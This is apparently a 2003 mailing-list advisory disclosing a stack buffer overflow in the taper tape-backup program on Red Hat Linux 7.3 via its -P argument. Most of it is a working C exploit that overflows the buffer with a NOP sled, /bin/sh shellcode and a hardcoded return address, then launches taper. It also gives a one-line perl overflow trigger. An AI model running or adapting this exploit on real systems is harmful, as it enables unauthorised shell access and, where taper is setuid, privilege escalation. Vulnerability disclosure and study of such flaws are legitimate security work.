The taper program in Redhat 7.3 contains a stack overflow. Note that taper is not setuid.
89a935c740c96748fa0a62389876ff938ee1fb09b87005b568f271a93db7ee97
HI,
There is a stack overflow vulnerability in taper program of linux
7.3 (may be others)..
On linux 7.3 its not suid by default. But i dont know about other distro/ver
. may be its
suid on others..
Advisory:
------------------------------------------------------------------------------------------------------------------------------
gEEkz-advisory
NrAziz(c) 2003
nraziz_at_geekz_nl
polygrithm_at_hotmail
http://geekz.nl
--{0x01 Introduction:
Taper is a user friendly archive program especially designed
for backing up to tape drives. It also supports backing up to files
on a hard disk.
--{0x02 Vulnerability:
taper has a vulnerability in its argument to -P .By giving a large
string it overwrites the eip..
e.g taper `perl -e 'print "A" x 2708'` over writes the eip. It may have
other possible vulnerabilites because
of the usage of many strcpy's. Taper by default is none-suid on Linux
7.3,However if its suid
on any other distro/ver please let me know then..
--{0x03 Greetz:
To gEEkz team,rave,gorny,and other m8s
------------------------------------------------------------------------------------------------------------------------------
Exploit:
------------------------------------------------------------------------------------------------------------------------------
/* gEEkz-taper-xploit */
/*
* Copyright(C) 2003 NrAziz
* nraziz^at^geekz^nl
*/
#include <stdio.h>
#include <stdlib.h>
/* /bin/sh */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
"\x80\xb0\x01\x31\xdb\xcd\x80";
#define B_SIZE 2708
int main(int argc,char **argv)
{
char buffer[B_SIZE];
int i;
u_long ret=0xbffff250;
memset(buffer,0x90,B_SIZE-strlen(shellcode)-4);
buffer[B_SIZE-4]=(ret & 0x000000ff);
buffer[B_SIZE-3]=(ret & 0x0000ff00)>>8;
buffer[B_SIZE-2]=(ret & 0x00ff0000)>>16;
buffer[B_SIZE-1]=(ret & 0xff000000)>>24;
buffer[B_SIZE-0]=0;
memcpy(buffer+B_SIZE-strlen(shellcode)-4,shellcode,strlen(shellcode));
execl("/usr/sbin/taper","taper","-P",buffer,(char *)0);
return 0;
}
---------------------------------------------------------------------------------------------------------------------------------------
REgards,
NrAziz
_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*.
http://join.msn.com/?page=features/featuredemail